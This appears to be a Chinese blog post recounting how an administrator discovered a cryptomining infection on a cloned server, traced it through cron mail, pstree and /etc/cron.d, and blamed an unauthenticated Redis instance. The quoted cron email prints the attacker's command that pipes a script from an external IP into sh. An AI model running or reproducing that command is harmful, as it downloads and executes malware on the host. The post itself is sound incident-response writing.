zoukankan      html  css  js  c++  java
  • 一个挖矿病毒的简单发现历程

    今天Clone同事一个开发环境, Clone之后发现 root用户GUI登录不上, 感觉很奇怪. 

    使用ssh连接nmtui 修改ip地址之后, xshell 连接就可以用了. 但是发现问题:

    [root@test-worker02 src]# 
    您在 /var/spool/mail/root 中有邮件

    查看具体的邮件信息为:

    From: "(Cron Daemon)" <root@test-worker02.localdomain>
    To: root@test-worker02.localdomain
    Subject: Cron <root@test-worker02> curl -fsS 94.237.85.89:8080/0l|sh
    Content-Type: text/plain; charset=UTF-8
    Auto-Submitted: auto-generated
    Precedence: bulk
    X-Cron-Env: <XDG_SESSION_ID=77178>
    X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
    X-Cron-Env: <LANG=zh_CN.UTF-8>
    X-Cron-Env: <SHELL=/bin/sh>
    X-Cron-Env: <HOME=/root>
    X-Cron-Env: <PATH=/usr/bin:/bin>
    X-Cron-Env: <LOGNAME=root>
    X-Cron-Env: <USER=root>
    Message-Id: <20210221060408.BCC5E231DDC7@test-worker02.localdomain>
    Date: Sun, 21 Feb 2021 14:04:08 +0800 (CST)

    立马警觉, 应该是挖矿病毒的玩法. 

    开始找问题原因

    先查crontab 的内容

    crontab -e 
    
    发现内容为空, 感觉比较奇特--这里发现自己还是对linux不熟悉有多重方式创建计划任务. 

    然后查看进程树. 

    pstree 看到奇特的命令为:
            ├─colord───2*[{colord}]
            ├─crond─┬─44*[crond───sh─┬─sh]
            │       │                └─wget]
            │       └─2*[crond───sh─┬─curl]
            │                       └─sh]

    相应的继续查找进程信息

    ps -ef |grep wget 

     毫无疑问中招

    可以分析怎么个情况. 

    然后在 

    /etc/cron.d/  下有发现

     发现内容为:

     充分怀疑使用了redis 弱密码或者是无密码操作.

    然后外部机器进行redis-cli 的登录

    发现果然无密码...

    要求整改下线redis 或者添加密码 修改了 监听 localhost

    但是唯一的好消息是 这个法兰客服的ip地址 已经挂了 (不知道是不是欧洲大火搞的)

     安全猛于虎.

  • 相关阅读:
    建议博客园搭个威客平台,可行的发展方向和盈利方向
    SQLServer DBA 三十问(第11~20题)
    sqlserver2000中nvarchar保存韩文乱码问题解决
    beginning Linux programming读书笔记(2)之shell编程
    IBM打狗问题
    Perl入门笔记2之第二章 标量数据
    linux面试大全
    结构体对齐详解
    Linux下静态链接库与动态链接库的区别
    Perl入门 笔记1之第一章简介
  • 原文地址:https://www.cnblogs.com/jinanxiaolaohu/p/14541234.html
Copyright © 2011-2022 走看看